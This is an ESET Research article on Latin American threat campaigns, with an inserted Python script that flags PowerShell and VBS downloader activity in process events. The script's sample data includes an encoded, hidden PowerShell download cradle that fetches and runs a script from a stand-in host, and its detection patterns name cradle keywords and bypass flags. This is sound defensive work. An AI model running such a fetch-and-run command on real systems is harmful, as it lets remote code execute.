The Universe of Threats in LATAM

ESET Research

ESET researchers reveal a growing sophistication in threats affecting the LATAM region, which employ evasion techniques and high-value targeting

Operation King TUT: The universe of threats in LATAM

Much like the life and mysterious death of Pharaoh Tutankhamun, also known as King Tut, the threat landscape in Latin America (LATAM) remains shrouded in mystery. This is mainly due to the limited global attention paid to the evolving malicious campaigns within the region. While notable events such as ATM attacks, the banking trojans born in Brazil, and the Machete cyberespionage operations have garnered media coverage, we are aware that there is more to the story.

In a parallel to how archaeological excavations of King Tut’s tomb shed light on ancient Egyptian life, we embarked on a journey to examine less-publicized cyberthreats affecting Latin American countries. Our initiative, named Operation King TUT (The Universe of Threats), sought to explore this significant threat landscape. On October 5th, we presented the results of our comparative analysis at the Virus Bulletin 2023 conference: the full conference paper can be read here.

In the analysis, we chose to look back at various publicly documented campaigns targeting the LATAM region between 2019 and 2023, as can be seen in the timeline below. All of these cybercriminal activities are detected exclusively in Latin America and are not associated with global crimeware. Since each of these operations has its own distinctive characteristics and does not appear to be linked to any known threat actor, it is highly likely that multiple actors are at play.

Figure 1 - Timeline of publications on attacks in LATAM, tracked by ESET

Our research revealed a notable shift from simplistic, opportunistic crimeware to more complex threats. In particular, we have observed a transition in targeting, moving from a focus on the general public to high-profile users, including businesses and governmental entities. These threat actors frequently update their tools, introducing different evasion techniques to increase the success of their campaigns. Moreover, they have expanded their crimeware business beyond Latin America, mirroring the pattern seen in the banking trojans born in Brazil.

Our comparison also shows that most of the malicious campaigns seen in the region are directed at enterprise users, including government sectors. They rely primarily on spearphishing emails to reach potential victims, often impersonating well-known organizations within a specific country in the region, particularly government or tax entities.

The precision and specificity observed in these attacks point to a high level of targeting, indicating that the threat actors have detailed knowledge about their intended victims. In these campaigns, attackers utilize malicious components like downloaders and droppers, mostly created in PowerShell and VBS.
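The PowerShell and VBS downloaders and droppers described above leave their clearest trace at process creation: a mail client or script host spawning an interpreter from a user-writable path, often with an encoded command line. The following is an added example (not ESET's code and not taken from the conference paper) that triages constructed Sysmon Event ID 1 / Security 4688-style events with generic heuristics: it decodes -EncodedCommand payloads, looks for download cradles, hidden windows and execution-policy bypass, and flags script hosts launched from Temp or Downloads by Office or Outlook. The event fields, file names, URL and scoring threshold are all assumptions for illustration.

```python
"""Heuristic triage of Windows process-creation events for PowerShell/VBS
downloader and dropper activity. Added example for this article; the events,
paths and threshold below are constructed, not drawn from ESET telemetry."""
import base64
import re

# Constructed sample events (parent image, image, command line). Stage 2's
# -EncodedCommand blob is built here as base64 of UTF-16LE, as PowerShell expects.
SAMPLE_EVENTS = [
    {   # stage 1: mail client launches a VBS attachment dropped into Temp
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "image": r"C:\Windows\System32\wscript.exe",
        "cmdline": r'wscript.exe //B "C:\Users\ana\AppData\Local\Temp\Comprobante_fiscal.vbs"',
    },
    {   # stage 2: the VBS spawns an encoded, hidden PowerShell download cradle
        "parent": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -Ep Bypass -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
            .encode("utf-16-le")).decode(),
    },
    {   # benign: maintenance script run from Explorer, nothing suspicious
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
OFFICE_OR_MAIL = ("outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe")
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta)\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED = re.compile(r"\s-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)
BYPASS = re.compile(r"\s-e(?:xecutionpolicy|p)\s+bypass\b", re.I)
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
    r"Start-BitsTransfer|Invoke-Expression|\bIEX\b", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "ignore")
    except ValueError:  # binascii.Error is a ValueError: not real base64
        return ""


def score_event(ev):
    """Return (score, reasons) for one process-creation event; score = hit count."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    reasons = []
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd):
        reasons.append("script-host-from-user-writable-path")
    if parent in OFFICE_OR_MAIL and image in SCRIPT_HOSTS + POWERSHELL:
        reasons.append("office-or-mail-spawned-interpreter")
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            reasons.append("script-host-spawned-powershell")
        decoded = decode_encoded_command(cmd)
        if decoded:
            reasons.append("encoded-command")
        if HIDDEN.search(cmd):
            reasons.append("hidden-window")
        if BYPASS.search(cmd):
            reasons.append("executionpolicy-bypass")
        # check the cradle keywords in both the raw and the decoded command line
        if CRADLE.search(cmd + " " + decoded):
            reasons.append("download-cradle")
    return len(reasons), reasons


def scan(events, threshold=2):
    """Return (index, score, reasons) for every event scoring at or above threshold."""
    alerts = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((i, score, reasons))
    return alerts


if __name__ == "__main__":
    for idx, score, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} ({', '.join(reasons)})")
```

The threshold of two hits keeps a lone `-WindowStyle Hidden` from an admin script out of the queue while the two-stage chain above scores on both its stages; in production the same logic belongs in a SIEM rule keyed on parent/child image and command line rather than a standalone script.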

Regarding the tools used in these malicious operations in Latin America, our observations indicate a preference for RATs, particularly from the njRAT and AsyncRAT families. Additionally, in campaigns primarily targeting government entities, we have identified the use of other malware families like Bandook and Remcos, albeit to a lesser extent.

Based on the conclusions resulting from our comparison, we believe that there is more than just one group behind the proliferation of these types of campaigns and that these groups are actively looking into different techniques and ways for their campaigns to be as successful as possible. Additionally, we suspect that socioeconomic disparities prevalent in Latin America may influence the modus operandi of attackers in this region, although this particular aspect falls beyond the scope of our research. The full VB2023 conference paper about Operation King TUT is available here.

Aggregated indicators of compromise (IoCs) can be found on our GitHub repository.

For any inquiries about our research published on WeLiveSecurity, please contact us at [email protected].

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.